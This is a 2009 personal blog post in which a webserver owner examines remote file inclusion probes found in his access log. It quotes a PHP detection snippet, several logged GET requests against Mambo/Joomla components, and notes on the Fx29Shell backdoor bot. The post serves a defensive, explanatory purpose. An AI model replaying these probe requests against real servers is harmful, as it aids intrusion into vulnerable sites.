Somebody in Denmark thought something in ... / 2009-11-19

2009-11-19 Somebody in Denmark thought something in ...
Somebody in Denmark thought something in this webserver would run some default and vulnerable software and tried to find a hole:
$ grep -c ~httpd/idefix/logs/access_log
All tries to display which is a bit of PHP source:
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>
Which will display ShiroHige as one word when run through the php processor.

All urls are attempts where it is assumed some vulnerable script is behind some visible part of the site such as the root, or my homepage, or some part of my homepage. Samples:

GET //?mosConfig_absolute_path=%0D
GET /~koos//?mosConfig_absolute_path=%0D
GET /~koos//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=%20%0D
GET /~koos/newsitem.cgi//?mosConfig_absolute_path=%0D
GET /~koos/newsitem.cgi//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=%20%0D
GET /~koos/newstag.cgi/security%20%20//libraries/pcl/pcltar.php?g_pcltar_lib_dir=%20
GET /~koos/newstag.cgi/security%20%20//templates/be2004-2/index.php?mosConfig_absolute_path=%20%0D
GET /~koos/newstag.cgi/security%20%20//modules/mod_weather.php?absolute_path=%20%0D
A bit of research finds that the next bit of code to execute would try to get info on the php setup (os, rights, free disk space). The third bit is running an entire bot with a few backdoors. I tried to find where the backdoor would connect to but that is all dynamic, only when the third script is loaded via the vulnerability a number of variables are set with the IP and port to connect to.

Like any good bot, it also notifies its maker in a hidden away part of its source, which would look like:

Subject: Fx29Shell by

Boss, there was an injected target on by
Searching on the term Fx29Shell gives a scary answer: Results 1 - 10 of about 221,000 for Fx29Shell. a lot of those still showing webservers where this script is active.

But all my home-made webstuff is not in the habit of executing remote php scripts. But given the load of sites hosted on it's probably a script running on that server which got hacked from a third place.

Tags: ,

IPv6 check

Running test...
, reachable as PGP encrypted e-mail preferred. PGP key 5BA9 368B E6F3 34E4 local copy PGP key 5BA9 368B E6F3 34E4 via keyservers

Meningen zijn die van mezelf, wat ik schrijf is beschermd door auteursrecht. Sommige publicaties bevatten een expliciete vermelding dat ze ongevraagd gedeeld mogen worden.
My opinions are my own, what I write is protected by copyrights. Some publications contain an explicit license statement which allows sharing without asking permission.
Other webprojects: Camp Wireless, wireless Internet access at campsites, The Virtual Bookcase, book reviews
This page generated by $Id: newsitem.cgi,v 1.58 2022/12/12 15:34:31 koos Exp $ in 0.010081 seconds.